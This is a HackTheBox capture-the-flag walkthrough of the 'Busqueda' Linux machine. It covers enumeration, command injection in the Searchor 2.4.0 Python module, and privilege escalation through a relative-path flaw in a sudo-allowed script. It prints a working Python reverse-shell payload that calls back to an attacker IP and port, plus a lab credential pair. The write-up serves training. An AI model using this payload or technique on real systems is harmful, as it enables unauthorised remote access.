In this walk through, we will be going through the Busqueda room from HackTheBox. This room is rated as Easy on the platform and it consists of Enumeration, Exploitation and Privilege Escalation of a Linux boot2root machine. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Busqueda |
IPaddress | 10.10.11.208 |
Difficulty | Easy |
OS | Linux |
Description | Busqueda is an Easy Difficulty Linux machine that involves exploiting a command injection vulnerability present in a Python module. To get root, we logged into the local gitea service by getting creds in a config file and then abused a python file running as root to get root. |
Enumeration:
- I started off with a regular nmap scan with service detection and found two ports opened – 22 (SSH) and 80 (HTTP)
$ sudo nmap -sS -sV 10.10.11.208 Nmap scan report for 10.10.11.208 Host is up (0.22s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) 53/tcp filtered domain 80/tcp open http Apache httpd 2.4.52 Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 28.75 seconds
- I tried to access the webserver running on port 80 and it was resolving to a hostname – searcher.htb. So added it to my /etc/hosts file and accessed the application.
- The Searcher application was a web app developed to search with custom queries using different search engines and online networks. I tried to search for some pussies using google with auto-redirect unchecked and it seems like the application is forming a search URL with our searched term for the desired search engine.
- Fired up gobuster to see if we can find some interesting directories however got no luck with it.
$ gobuster dir -u http://searcher.htb/ -w ~/Desktop/Wordlist/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://searcher.htb/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2023/12/01 13:24:51 Starting gobuster in directory enumeration mode =============================================================== /search (Status: 405) [Size: 153] /server-status (Status: 403) [Size: 277] =============================================================== 2023/12/01 13:26:39 Finished ===============================================================
- Next, i intercepted the search request using Burpsuite and in the response field, found an interesting header named server which shows the application is developed in python 3.10.6 with Werkzeug (Flask) 2.1.2. Searched for any known exploits for the flask version but found nothing.
- Next, the footer caught my attention as there is a python module name – Searchor is mentioned along with its version – 2.4.0
- Searched for any known exploit for the concerned module and found an exploit POC for that. As per the POC, the vulnerability lies in the eval() function which let us run arbitrary commands on the server and thus leads to command injection. Bingo!
Initial Access:
- Next, used the below python reverse shell payload to get initial access on the web server and captured the user flag.
', exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.2',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"))#
Privilege Escalation:
- To find potential privilege escalation vectors, uploaded linpeas on the target and executed it.
- The linpeas result shows some interesting directories which has some git config files. Looked into the config file for the flask application running and it reveals a new domain named “gitea.searcher.htb” and the user password.
- Added the new domain to our /etc/hosts file and logged into it using the found credentials. The application had 1 commit done by the administrator which has a SHA1 hash alongside it.
cody:jh1usoih2bkjaspwe92
- Moving on, checked the sudo permissions for the user svc using the found password. As per the result, we found out that we can run the system-checkup.py script as user root.
sudo -l
- Checked the working of the script using the whoami command and it throws me an error showcasing the usage. The script takes three commands as arguments – docker ps, docker inspect and full checkup.
- I tried to run script with full-checkup as argument from my home directory and it failed. That means, it is using a relative path for the full-checkup script instead of absolute.
- I developed a script to view the contents of the root.txt file with the same name as full-checkup in the /tmp directory and executed it with the help of system-checkup.py script. Thus, getting the root flag.
Also Read: Webgoat – Without password
Conclusion:
So that was “Busqueda” for you. We started off with our regular nmap scan and found two ports opened – 22 (SSH) and 80 (HTTP). Next, enumerated the web server on port 80 and found a searcher application running which was using the searcher 2.4.0 python module. Looked for any known exploits related to it and found one. Used it to get the initial access on the target. For privilege escalation, found the git creds in a git config file. With the help of that, logged into the gitea subdomain and found password for user svc. At last, abused the system-checkup.py script to get root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.